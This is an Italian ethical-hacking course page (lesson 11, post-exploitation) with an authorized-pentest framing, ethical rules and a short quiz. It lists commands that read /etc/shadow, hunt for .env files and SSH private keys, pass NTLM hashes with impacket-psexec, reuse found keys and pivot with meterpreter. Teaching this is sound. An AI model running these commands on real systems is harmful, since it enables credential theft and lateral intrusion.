💻 Software hacking Avanzato ⏱ 75 min 👁 5 visualizzazioni

Corso Hacking Etico #11: Post-Exploitation

Davide Russo @CyberSec_Italia · 1 giorni fa · aggiornato 2 ore fa
📥
Piano di Studio Completo — Scarica il PDF
Percorso strutturato con settimane, risorse e checklist. Gratis, nessuna registrazione richiesta.
⬇ Scarica PDF

Cosa Fare Dopo il Root

Sei root o SYSTEM. La post-exploitation dimostra l'impatto reale al cliente.

Raccolta Prove

id && hostname && date && ip addr
cat /etc/shadow
find / -name ".env" 2>/dev/null | head -20

Lateral Movement

# Pass-the-Hash:
impacket-psexec -hashes :NTLM_HASH [email protected]

# SSH con chiavi trovate:
find / -name "id_rsa" 2>/dev/null
ssh -i id_rsa user@altro-server

# Pivoting:
meterpreter > run post/multi/manage/autoroute

Regole Etiche

  • Non modificare o cancellare dati reali
  • Non esfiltrare dati sensibili
  • Documenta ogni azione
  • Rimuovi tutti gli strumenti a fine test

Cleanup

userdel -r test_user
rm /tmp/linpeas.sh /tmp/tools/*

Conclusione

Modulo finale: scrivere il report professionale.

🧠 Metti alla prova le tue conoscenze

3 domande · Soglia superamento: 70%

1. Qual è la regola etica fondamentale durante la post-exploitation?

2. Cosa è il lateral movement?

3. Cosa si deve fare a fine test con tutti gli strumenti caricati?

Accedi per completare il quiz.

💬 Commenti (0)

Nessun commento ancora. Sii il primo!

Accedi per commentare.